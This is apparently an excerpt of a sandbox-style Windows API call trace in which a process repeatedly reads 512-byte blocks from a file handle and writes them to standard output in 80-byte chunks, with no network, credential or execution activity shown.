[0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.860] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.862] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.862] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType 
(hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.863] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.863] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, 
lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.865] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 
[0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] GetFileType (hFile=0x50) returned 0x1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] GetFileType (hFile=0x50) returned 0x1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.867] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.869] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, 
lpOverlapped=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] GetFileType (hFile=0x50) returned 0x1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] GetFileType (hFile=0x50) returned 0x1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 
| out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.871] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 
